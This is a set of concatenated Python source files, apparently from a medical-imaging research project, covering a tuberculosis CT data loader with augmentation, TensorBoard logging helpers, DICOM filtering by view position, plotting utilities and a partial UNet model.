from imgaug import augmenters as iaa
from sampler import BalancedBatchSampler
plt.ion()
class dataconfig(object):
def __init__(self, dataset='default', subset='0', **kwargs):
self.dataset = dataset
self.dir = r'C:\Users\Xing\Projects\TB2020\code\ecg_classification_torch\code'
self.csv = 'TB_label_0426.csv'
self.subset = subset
self.csv_file = os.path.join(self.dir,self.csv)
class batch_sampler():
def __init__(self, batch_size, class_list):
self.batch_size = batch_size
self.class_list = class_list
self.unique_value = np.unique(class_list)
self.iter_list = []
self.len_list = []
for v in self.unique_value:
indexes = np.where(self.class_list == v)[0]
self.iter_list.append(self.shuffle_iterator(indexes))
self.len_list.append(len(indexes))
self.len = len(class_list) // batch_size
# print('self.len: ', self.len)
def __iter__(self):
index_list = []
for _ in range(self.len):
for index in range(self.batch_size):
index_list.append(next(self.iter_list[index % len(self.unique_value)]))
np.random.shuffle(index_list)
yield index_list
index_list = []
def __len__(self):
return self.len
@staticmethod
def shuffle_iterator(iterator):
# iterator should have limited size
index = list(iterator)
total_size = len(index)
i = 0
random.shuffle(index)
while True:
yield index[i]
i += 1
if i >= total_size:
i = 0
random.shuffle(index)
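# --- Illustrative sketch (not part of the original module) --------------------
# Minimal usage of batch_sampler: with a binary class_list and batch_size=4,
# every yielded index list interleaves the two classes, giving roughly
# class-balanced batches. The class_list values below are toy data.
def _batch_sampler_example():
    class_list = np.array([0, 0, 0, 0, 0, 0, 1, 1])
    sampler = batch_sampler(batch_size=4, class_list=class_list)
    batches = [batch for batch in sampler]   # len(sampler) == len(class_list) // 4 == 2
    return batches                           # each batch holds 2 class-0 and 2 class-1 indices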
class DataGenerator(Dataset):
def __init__(self, config=None,transform = None,type='0.simplist'):
self.config = config
self.imgsz = 256
self.conlen = 32
self.debug = False
self.df = self.parse_csv(self.config.csv_file, self.config.subset)
self.df.reset_index(drop=True, inplace=True)
self.transform = transform
self.type = type
def __len__(self):
# if self.config.subset == '0':
# print('len = {}'.format(2*len(self.df)))
# return 2*len(self.df)
print('len = {}'.format(len(self.df)))
return len(self.df)
def img_augmentation(self,img,seq_det):
img = img.transpose(2,0,1).astype(np.float32)
for i in range(len(img)):
img[i,:,:] = seq_det.augment_images(img[i,:,:])
img = img.transpose(1,2,0).astype(np.float64)
return img
def img_generator(self,index,data,con_len,ss=1):
# '0.simplist': pick the center con_len slices from data and mask and concatenate them together
img = np.zeros([self.imgsz, self.imgsz, con_len])
img_l = np.zeros([self.imgsz, self.imgsz, con_len])
img_s = np.zeros([self.imgsz, self.imgsz, con_len])
img_b = np.zeros([self.imgsz, self.imgsz, con_len])
msk = np.zeros([self.imgsz, self.imgsz, con_len])
msk1 = np.zeros([self.imgsz, self.imgsz, con_len])
if self.type == '0.simplist':
img_len = self.df.loc[index,'len']
center_i = img_len // 2
if con_len <= img_len:
start_i = center_i - con_len//2
end_i = start_i+con_len
img = data['data'][:, :, start_i:end_i]
msk = data['mask'][:, :, start_i:end_i]
else:
start_i = con_len//2 - img_len//2
end_i = start_i+img_len
img[:,:,start_i:end_i] = data['data']
msk[:,:,start_i:end_i] = data['mask']
elif self.type == '1: slice_sampled':
img_len = self.df.loc[index, 'len']
center_i = img_len // 2
ds = self.df.loc[index,'ds']
if ds == 1:
ds = ss*ds
else:
ds = ss*ds//2
if ds*con_len <= img_len:
start_i = center_i - ds*con_len // 2
end_i = start_i + ds*con_len
img = data['data'][:, :, start_i:end_i:ds]
msk = data['mask'][:, :, start_i:end_i:ds]
#msk1 = data['mask1'][:, :, start_i:end_i:ds]
else:
start_i = con_len // 2 - img_len // 2 //ds
end_i = start_i + img_len//ds
img[:, :, start_i:end_i] = data['data'][:,:,0:img_len:ds]
msk[:, :, start_i:end_i] = data['mask'][:,:,0:img_len:ds]
#msk1 = data['mask1'][:, :, start_i:end_i:ds]
print(index, ds, img_len, start_i, end_i)
elif self.type == '1: slice_sampled_window':
img_len = self.df.loc[index, 'len']
center_i = img_len // 2
ds = self.df.loc[index,'ds']
if ds == 1:
ds = ss*ds
else:
ds = ss*ds//2
if ds*con_len <= img_len:
start_i = center_i - ds*con_len // 2
end_i = start_i + ds*con_len
img = data['data'][:, :, start_i:end_i:ds]
msk = data['mask'][:, :, start_i:end_i:ds]
img_l = data['data_l'][:, :, start_i:end_i:ds]
img_s = data['data_s'][:, :, start_i:end_i:ds]
img_b = data['data_b'][:, :, start_i:end_i:ds]
#msk1 = data['mask1'][:, :, start_i:end_i:ds]
else:
start_i = con_len // 2 - img_len // 2 //ds
end_i = start_i + img_len//ds
img[:, :, start_i:end_i] = data['data'][:,:,0:img_len:ds]
msk[:, :, start_i:end_i] = data['mask'][:,:,0:img_len:ds]
img_l[:, :, start_i:end_i] = data['data_l'][:, :, 0:img_len:ds]
img_s[:, :, start_i:end_i] = data['data_s'][:, :, 0:img_len:ds]
img_b[:, :, start_i:end_i] = data['data_b'][:, :, 0:img_len:ds]
#msk1 = data['mask1'][:, :, start_i:end_i:ds]
print(index, ds, img_len, start_i, end_i)
elif self.type == '2: slice_sampled_aug':
img_len = self.df.loc[index, 'len']
center_i = img_len // 2
ds = self.df.loc[index,'ds']
ds = ss*ds
if ds == 1:
ds = ss*ds
else:
ds = ss*ds//2
if ds*con_len <= img_len:
start_i = center_i - ds*con_len // 2
end_i = start_i + ds*con_len
img = data['data'][:, :, start_i:end_i:ds]
msk = data['mask'][:, :, start_i:end_i:ds]
msk1 = data['mask1'][:, :, start_i:end_i:ds]
else:
start_i = con_len // 2 - img_len // 2 //ds
end_i = start_i + img_len//ds
img[:, :, start_i:end_i] = data['data'][:,:,0:img_len:ds]
msk[:, :, start_i:end_i] = data['mask'][:,:,0:img_len:ds]
msk1[:, :, start_i:end_i] = data['mask1'][:, :, 0:img_len:ds]
print(index, ds, img_len, start_i, end_i)
elif self.type == '3: slice_avg_window':
img_len = self.df.loc[index, 'len']
center_i = img_len // 2
ds = self.df.loc[index,'ds']
if ds == 1:
ds = ss*ds
else:
ds = ss*ds//2
if ds*con_len <= img_len:
start_i = center_i - ds*con_len // 2
end_i = start_i + ds*con_len
img = data['data'][:, :, start_i:end_i:ds]
msk = data['mask'][:, :, start_i:end_i:ds]
img_l = data['data_l'][:, :, start_i:end_i:ds]
img_s = data['data_s'][:, :, start_i:end_i:ds]
img_b = data['data_b'][:, :, start_i:end_i:ds]
#msk1 = data['mask1'][:, :, start_i:end_i:ds]
else:
start_i = con_len // 2 - img_len // 2 //ds
end_i = start_i + img_len//ds
img[:, :, start_i:end_i] = data['data'][:,:,0:img_len:ds]
msk[:, :, start_i:end_i] = data['mask'][:,:,0:img_len:ds]
img_l[:, :, start_i:end_i] = data['data_l'][:, :, 0:img_len:ds]
img_s[:, :, start_i:end_i] = data['data_s'][:, :, 0:img_len:ds]
img_b[:, :, start_i:end_i] = data['data_b'][:, :, 0:img_len:ds]
#msk1 = data['mask1'][:, :, start_i:end_i:ds]
print(index, ds, img_len, start_i, end_i)
dec = random.choice(range(4))
if dec == 1 and self.df.loc[index,'valid'] == '0':
#print('{} is img_auged'.format(index))
seq = iaa.SomeOf((3, 6), [
#iaa.Fliplr(0.8),
#iaa.Flipud(0.8),
iaa.Multiply((0.8, 1.2)),
iaa.GaussianBlur(sigma=(0.0, 0.2)),
iaa.PiecewiseAffine((0.02, 0.06)),
iaa.Affine(
# rotate=(-5, 5),
shear=(-5, 5),
scale=({'x': (0.8, 1.1), 'y': (0.8, 1.1)}) # to strentch the image along x,y axis
)
])
seq_det = seq.to_deterministic()
img = self.img_augmentation(img,seq_det=seq_det)
img_l = self.img_augmentation(img_l, seq_det=seq_det)
img_s = self.img_augmentation(img_s, seq_det=seq_det)
img_c = np.array([img,img_l,img_s,img])
#print('{} is read'.format(index))
return img_c
def lab_generator(self,index):
cls = {
'1':'LeftLungAffected',
'2':'RightLungAffected',
'3':'CavernsLeft',
'4':'CavernsRight',
'5':'PleurisyLeft',
'6':'PleurisyRight'
}
label = []
for i in range(len(cls)):
label.append(self.df.loc[index,cls[str(i+1)]])
return label
def __getitem__(self, index):
if self.imgsz == 256:
img_path = self.df.loc[index, 'data_path']
elif self.imgsz == 512:
img_path = self.df.loc[index, 'data_path_512']
# print(img_path)
# image = cv2.imread(img_path)
data = sio.loadmat(img_path)
image = self.img_generator(index,data,con_len = self.conlen,ss= 1)
#image = image.reshape(3,48,256,256)
image = image.transpose(0,3,1,2)
label = np.array(self.lab_generator(index))
# label = label.reshape(-1,1)
# landmarks = landmarks.reshape(-1, 2)
# sample = {'image': image, 'label': label}
if self.transform:
image = self.transform(image)
if self.debug:
print('data generator debug:',image.shape)
plt.imshow(np.squeeze(image[1,24,:,:]))
return image,label
@staticmethod
def parse_csv(csv_file, subset):
data_frame = pd.read_csv(csv_file)
data_frame = data_frame[data_frame['valid'] == int(subset)]
return data_frame
def show_landmarks(image, landmarks):
"""SHow image with landmarks"""
plt.imshow(image)
# plt.scatter(landmarks[:, 0], landmarks[:, 1], s=10, marker=".", c="r")
if __name__ == "__main__":
# config = {"aug": True, "subset": 'training', "save_img": True, "add_noise": False}
# config = {"dataset": 'mammo_calc',"subset": '0'}
# train_config = dataconfig(**config)
# train_dataset = DataGenerator(train_config,transform= transforms.ToTensor())
#
#
# train_dataloader = DataLoader(train_dataset, num_workers=1, batch_size=4,shuffle= True)
#
# num_classes = 1
# model = resnet2d.ResNet(dataset='calc', depth=34, num_classes=num_classes)
#
# criterion = torch.nn.BCELoss().cuda()
#
# # print(train_dataloader.batch_size)
#
# for i, (images,labels) in enumerate(train_dataloader):
# # print(sample['image'])
# outputs = model(images)
# labels = labels.float().reshape(-1,1)
# print(outputs.shape,labels.shape)
# loss = criterion(outputs,labels)
# print('loss: ',loss)
valconfig = {"dataset": "tb2020","subset": '0'}
val_config = dataconfig(**valconfig)
validation_data = DataGenerator(val_config,transform= None,type='1: slice_sampled')
#val_loader = DataLoader(validation_data, batch_size=12, num_workers=1, shuffle=True)
#batch_sampler = batch_sampler(batch_size=6,class_list=range(6))
val_loader = DataLoader(validation_data,num_workers=1,sampler=BalancedBatchSampler(validation_data,type='multi_label'),batch_size=6)
for i, (images, labels) in enumerate(val_loader):
print(i)
print(labels)
print(images.shape)
<file_sep>"""Utility functions for data exploration"""
import json
import matplotlib.pylab as plt
import pandas as pd
import seaborn as sns
sns.set(style="darkgrid")
plt.rcParams['figure.figsize'] = (6, 6)
def plot_scatter(df, vars=['width', 'height'], hue='birads',
logy=True, logx=True, color_palette="Set2"):
"""Plot scatter plot
Args:
df:
vars: list of columns to plot, in the order of [x, y]
hue:
logy:
logx:
color_palette:
Returns:
None
"""
xlabel, ylabel = vars[:2]
hue_order = sorted(df[hue].unique())
colors = sns.color_palette(color_palette, len(hue_order))
# if any value is string and cannot be converted to a numerical value, plot categorically
is_categorical = any([type(a) is str and not a.isdigit() for a in df[ylabel].unique()])
if is_categorical:
y_order = sorted(df[ylabel].unique())
for idx, label in enumerate(hue_order):
df_tmp = df[df[hue] == label]
xs = df_tmp[xlabel]
ys = df_tmp[ylabel]
if is_categorical:
ys = ys.apply(lambda x: y_order.index(x))
plt.scatter(xs, ys, color=colors[idx], label=label)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.legend()
if logx:
plt.xscale('log')
if logy and not is_categorical:
plt.yscale('log')
if is_categorical:
# print(list(zip(*(enumerate(hue_order)))))
plt.yticks(*zip(*(enumerate(y_order))))
def plot_bubble(df, vars=['disease', 'birads'], color='b'):
"""Plot bubble chart for categorical data
Args:
        df: pandas DataFrame containing the categorical columns
        vars: list of two categorical columns to plot, in the order of [x, y]
        color: matplotlib color used for the bubbles
Returns:
None
"""
xlabel, ylabel = vars[:2]
df_group = df.groupby([xlabel, ylabel]).count()['size']
x_order = sorted(df[xlabel].unique())
y_order = sorted(df[ylabel].unique())
max_count = max(df_group)
for idx, count in df_group.iteritems():
count /= max_count
x_idx, y_idx = idx
x, y = x_order.index(x_idx), y_order.index(y_idx)
plt.scatter(x, y, s=count * 10000, c=color, alpha=0.2, edgecolors='gray', linewidth=0)
plt.xticks(*zip(*(enumerate(x_order))))
plt.yticks(*zip(*(enumerate(y_order))))
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.title('Categorical Count')
def test():
json_file = '/tmp/lesion_dict.json'
with open(json_file, 'r') as f_in:
lesion_dict = json.load(f_in)
for key in list(lesion_dict.keys()):
for idx in lesion_dict[key].keys():
new_key = key + '-' + idx
lesion_dict[new_key] = lesion_dict[key][idx]
lesion_dict.pop(key)
df = pd.DataFrame.from_dict(lesion_dict, orient='index')
df = df.drop(['bbox'], axis=1)
df['size'] = ((df['width'] * df['height']) ** 0.5).astype(int)
plt.figure()
plot_scatter(df, vars=['size', 'birads'], hue='disease')
plt.show()
plot_bubble(df, vars=['birads', 'disease'])
plt.show()
if __name__ == '__main__':
test()<file_sep>import torch
import torchvision
import numpy as np
import matplotlib.pylab as plt
def calculate_accuracy_binary(outputs, targets):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
hit = ((outputs > 0.5) == targets).sum()
#hit = sum(abs(outputs-targets))
tsum = targets.shape[0]
return (hit + 1e-8) / (tsum + 1e-8)
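# Illustrative sketch (not part of the original file): calculate_accuracy_binary
# thresholds sigmoid outputs at 0.5 before comparing with the binary targets.
# The tensor values below are hypothetical.
def _example_calculate_accuracy_binary():
    outputs = torch.tensor([0.9, 0.2, 0.7, 0.4])  # predicted probabilities
    targets = torch.tensor([1.0, 0.0, 0.0, 0.0])  # ground-truth labels
    # predictions after thresholding: [1, 0, 1, 0] -> 3 out of 4 match the targets
    return calculate_accuracy_binary(outputs, targets)  # ~0.75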
def calculate_accuracy(outputs, targets):
#outputs = outputs.data.cpu().numpy().flatten()
#targets = targets.data.cpu().numpy().flatten()
max_vals, max_indices = torch.max(outputs, 1)
acc = (max_indices == targets.long()).sum().data.cpu().numpy() / max_indices.size()[0]
return acc
def image_cat(inputs,bs):
data=[]
for h in range(bs):
data.append(inputs[h, :, :, :])
data = [x for x in data]
data_all = torchvision.utils.make_grid(data, nrow=int(np.ceil(np.sqrt(len(data)))), padding=10, normalize=True,
range=None, scale_each=True)
return data_all
def add_image_unet(inputs,masks,est_maps,outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy()
targets = targets.data.cpu().numpy()
# print('image added... with len of {}'.format(len(targets)))
data_all = image_cat(inputs,targets.shape[0])
mask_all = image_cat(masks, targets.shape[0])
estmaps_all = image_cat(est_maps, targets.shape[0])
if subset == 'val':
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(sum(abs(outputs-targets))) + '/gt:' + str(targets) + '/pred:' + str(outputs),
img_tensor=data_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_' + str(sum(abs(outputs - targets))) + '/gt:' + str(
targets) + '/pred:' + str(outputs),
img_tensor=mask_all, global_step=epoch, dataformats='CHW')
        writer.add_image(subset + '_step_' + str(epoch) + '/diff_' + str(sum(abs(outputs - targets))) + '/gt:' + str(
            targets) + '/pred:' + str(outputs),
                         img_tensor=estmaps_all, global_step=epoch, dataformats='CHW')
else:
writer.add_image(subset + '_step_' + str(epoch ),img_tensor=data_all, global_step=epoch, dataformats='CHW')
def add_image_3d(inputs, outputs, targets, writer, subset, epoch,name):
outputs = outputs.data.cpu().numpy()
targets = targets.data.cpu().numpy()
# print('image added... with len of {}'.format(len(targets)))
data = []
for h in range(targets.shape[0]):
data.append(inputs[h, :, :, :])
data = [x for x in data]
# data = torch.cat(data, dim=0)
data_all = torchvision.utils.make_grid(data, nrow=int(np.ceil(np.sqrt(len(data)))), padding=10, normalize=True, range=None, scale_each=True)
# if subset == 'val':
# writer.add_image(subset + '_step_' + str(epoch) + '/Diff_'+str(sum(sum(abs(outputs-targets)))) + '/diff_'+str(sum(abs(outputs-targets))) + '/gt:' + str(targets) + '/pred:' + str(outputs),
# img_tensor=data_all, global_step=epoch, dataformats='CHW')
if subset == 'val':
# print('val image added')
writer.add_image(subset + '_step_' + str(epoch) +'/'+ name + '/diff_'+str(sum(abs(outputs-targets))) + '/gt:' + str(targets) + '/pred:' + str(outputs),
img_tensor=data_all, global_step=epoch, dataformats='CHW')
else:
# print('train image added')
writer.add_image(subset + '_step_' + str(epoch )+'/'+name,img_tensor=data_all, global_step=epoch, dataformats='CHW')
def add_image(inputs, outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data = []
data.append(inputs[h, :, :, :])
data = [x for x in data]
data = torch.cat(data, dim=1)
data_all = torchvision.utils.make_grid(data, nrow=1, padding=2, normalize=False, range=None, scale_each=False)
writer.add_image(subset + '_step_' + str(epoch) + '/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),
img_tensor=data_all, global_step=epoch, dataformats='CHW')
def add_gl_image(images,patches, outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None, scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_g_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_g_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_l_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_l_all, global_step=epoch, dataformats='CHW')
def add_gld_image(images,patches,details, outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_d = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_d.append(details[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_d = [x for x in data_d]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_d = torch.cat(data_d, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None, scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_d_all = torchvision.utils.make_grid(data_d, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_g_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_g_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_l_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_l_all, global_step=epoch, dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch) + '/diff_' + str(abs(outputs[h] - targets[h])) + '_d_/gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_d_all, global_step=epoch, dataformats='CHW')
def add_gl_image_index(images, patches, outputs, targets, writer, subset, epoch,index):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/g_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_g_all, global_step=epoch,
dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/l_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_l_all, global_step=epoch,
dataformats='CHW')
def add_gld_image_index(images, patches, details, outputs, targets, writer, subset, epoch,index):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_d = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_d.append(details[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_d = [x for x in data_d]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_d = torch.cat(data_d, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_d_all = torchvision.utils.make_grid(data_d, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/g_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_g_all, global_step=epoch,
dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/l_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_l_all, global_step=epoch,
dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch) + '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(
index) + '/d_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_d_all, global_step=epoch,
dataformats='CHW')
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
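# Illustrative sketch (not part of the original file): track a running loss with
# AverageMeter across batches of different sizes; the loss values are hypothetical.
def _example_average_meter():
    losses = AverageMeter()
    for batch_loss, batch_size in [(0.8, 4), (0.6, 4), (0.5, 2)]:
        losses.update(batch_loss, n=batch_size)
    # losses.avg == (0.8 * 4 + 0.6 * 4 + 0.5 * 2) / 10 == 0.66
    return losses.avg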
<file_sep>"""Utility functions for tensorflow"""
import tensorflow as tf
FLAGS = tf.app.flags.FLAGS
class FlagsObjectView(object):
"""For tensorflow 1.5 and above"""
def __init__(self, FLAGS):
self.__dict__ = FLAGS.flag_values_dict()
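# Illustrative sketch (not part of the original file), assuming TF 1.5+ where
# tf.app.flags is backed by absl and FLAGS.flag_values_dict() is available.
# The flag name below is hypothetical.
def _example_flags_object_view():
    tf.app.flags.DEFINE_integer('batch_size', 32, 'hypothetical example flag')
    FLAGS(['prog'])  # parse the (empty) command line so flag values can be read
    flags_view = FlagsObjectView(FLAGS)
    # FLAGS.batch_size and flags_view.batch_size now hold the same value,
    # but flags_view is a plain object that can be freely modified.
    flags_view.batch_size = 64
    return flags_view.batch_size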
<file_sep>#!/usr/bin/env python
# -*- coding: utf-8 -*-
import glob2
import os
try:
import dicom
except:
import pydicom as dicom
import shutil
from tqdm import tqdm
import json
def writeinfo(output_filename, content):
"""Write the content to txt
Args:
output_filename:
content:
Returns:
"""
if not os.path.isfile(output_filename):
mode = "w"
else:
mode = "a"
with open(output_filename, mode, encoding="utf-8") as f:
f.write(content)
f.write('\n')
def recursive_copy(src_dir, dst_dir):
"""Copy all files form src_dir to dst_dir with the same filename
Args:
src_dir:
dst_dir:
Returns:
"""
files = os.listdir(src_dir)
for file in files:
src_file = os.path.join(src_dir, file)
dst_file = os.path.join(dst_dir, file)
shutil.copyfile(src_file, dst_file)
class DicomFilter(object):
"""Filter out the dicom data that do not meed the demand in json file
Args:
        input_dir: directory that is recursively searched for dicom files
        config_file: json file describing the filtering criteria (read_config is currently a stub)
        output_dir: directory that filtered dicom files are copied to
"""
def __init__(self, input_dir, config_file, output_dir):
self._input_dir = input_dir
self._config_file = config_file
self._output_dir = output_dir
self._all_dcm_list = glob2.glob(os.path.join(self._input_dir, "**", "*"))
self._inlier_txt = os.path.join(self._input_dir, "inlier.txt")
self._outlier_txt = os.path.join(self._input_dir, "outlier.txt")
self._notag_txt = os.path.join(self._input_dir, "notag.txt")
def read_config(self):
pass
def filter_fracture(self, iscopy=False):
"""
Args:
iscopy:
Returns:
"""
fracture_filtered = []
print("*********fracture filter******")
for dcm in tqdm(self._all_dcm_list):
if os.path.isdir(dcm):
continue
try:
ds = dicom.read_file(dcm)
except:
continue
# print(dcm)
try:
study_description = ds.StudyDescription
content = dcm + "\t" + study_description
if 'chest' in study_description.lower() or 'rib' in study_description.lower() or 'body' in study_description.lower():
fracture_filtered.append(dcm)
# writeinfo(self._inlier_txt, content)
continue
else:
writeinfo(self._outlier_txt, content)
except:
content = dcm + " No StudyDescription Flag"
writeinfo(self._notag_txt, content)
print("No StudyDescription Flag")
try:
series_description = ds.SeriesDescription
content = dcm + "\t" + series_description
if 'chest' in series_description.lower() or 'rib' in series_description.lower() or 'body' in series_description.lower():
fracture_filtered.append(dcm)
# writeinfo(self._inlier_txt, content)
continue
else:
writeinfo(self._outlier_txt, content)
except:
content = dcm + " No SeriesDescription Flag"
writeinfo(self._notag_txt, content)
print("No SeriesDescription Flag")
try:
body_part_examined = ds.BodyPartExamined
content = dcm + "\t" + body_part_examined
if 'chest' in body_part_examined.lower() or 'rib' in body_part_examined.lower() or 'body' in body_part_examined.lower():
fracture_filtered.append(dcm)
# writeinfo(self._inlier_txt, content)
continue
else:
writeinfo(self._outlier_txt, content)
except:
content = dcm + " No BodyPartExamined Flag"
writeinfo(self._notag_txt, content)
print("No BodyPartExamined Flag")
try:
protocol_name = ds.ProtocolName
content = dcm + "\t" + protocol_name
if 'chest' in protocol_name.lower() or 'rib' in protocol_name.lower() or 'body' in protocol_name.lower():
fracture_filtered.append(dcm)
# writeinfo(self._inlier_txt, content)
continue
else:
writeinfo(self._outlier_txt, content)
except:
content = dcm + " No Protocol Flag"
writeinfo(self._notag_txt, content)
print("No Protocol Flag")
self._all_dcm_list = fracture_filtered
def filter_PA(self, iscopy=False):
"""
Returns:
None
        Writes out at most three txt files: inlier.txt, outlier.txt and notag.txt
"""
filtered = []
print("*********PA filter******")
for dcm in tqdm(self._all_dcm_list):
if os.path.isdir(dcm):
continue
# print(dcm)
img = dicom.read_file(dcm)
try:
view_position = img.ViewPosition
except:
try:
view_position = img.ProtocolName
except:
content = dcm + " No ViewPosition and ProtocolName tag"
writeinfo(self._notag_txt, content)
continue
if view_position == "PA":
filtered.append(dcm)
output_txt = self._inlier_txt
# copy the file
if iscopy:
if not os.path.exists(self._output_dir):
os.makedirs(self._output_dir)
src_dcm = dcm
dst_dcm = os.path.join(self._output_dir, os.path.basename(src_dcm))
shutil.copyfile(src_dcm, dst_dcm)
else:
output_txt = self._outlier_txt
content = dcm + "\t" + view_position
writeinfo(output_txt, content)
if __name__ == "__main__":
root_dir = r"/media/Data/Data02/Datasets/DR/Collection/China_Sample"
for dir in os.listdir(root_dir):
input_dir = os.path.join(root_dir, dir)
output_dir = r""
config_file = r""
dcm_filter = DicomFilter(input_dir, config_file, output_dir)
        dcm_filter.filter_fracture()
        dcm_filter.filter_PA()<file_sep>import numpy as np
import pandas as pd
import tensorflow as tf
import glob2
import glob
import os
import re
import matplotlib.pylab as plt
import matplotlib
<file_sep>from projects.drutils.bbox import calculate_union_area, calculate_union_area_v2
import numpy as np
def test_area():
np.random.seed(12)
max_pos = 10 ** 4
num_box = 30
boxes = np.random.randint(max_pos, size=(num_box, 4))
for box in boxes:
box[0], box[2] = min(box[0], box[2]), max(box[0], box[2])
box[1], box[3] = min(box[1], box[3]), max(box[1], box[3])
for i in range(num_box):
partial = boxes[:i + 1, ]
print(i)
result_1 = calculate_union_area(partial)
result_2 = calculate_union_area_v2(partial)
print(result_1, result_2)
assert (int(result_1) == int(result_2))
if __name__ == '__main__':
test_area()
<file_sep>import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from SDFY_project.unet_model.unet_parts import *
class UNet(nn.Module):
def __init__(self, n_channels, n_classes,
height, width,
n_seg_classes=1,
device=torch.device('cuda')):
super(UNet, self).__init__()
self.device = device
self.n_classes = n_classes
# With this network depth, there is a minimum image size
if height < 256 or width < 256:
raise ValueError('Minimum input image size is 256x256, got {}x{}'.\
format(height, width))
self.inc = inconv(n_channels, 64)
self.down1 = down(64, 128)
self.down2 = down(128, 256)
self.down3 = down(256, 512)
self.down4 = down(512, 512)
self.down5 = down(512, 512)
self.down6 = down(512, 512)
self.down7 = down(512, 512)
self.down8 = down(512, 512, normaliz=False)
self.up1 = up(1024, 512)
self.up2 = up(1024, 512)
self.up3 = up(1024, 512)
self.up4 = up(1024, 512)
self.up5 = up(1024, 256)
self.up6 = up(512, 128)
self.up7 = up(256, 64)
self.up8 = up(128, 64, activ=False)
self.outc = outconv(64, n_seg_classes)
        self.out_nonlin = nn.Sigmoid() # to solve the weird prediction-map problem @ 20190924 Xing
# self.softmax = nn.LogSoftmax(dim=1)
steps = 8
height_mid_features = height // (2 ** steps)
width_mid_features = width // (2 ** steps)
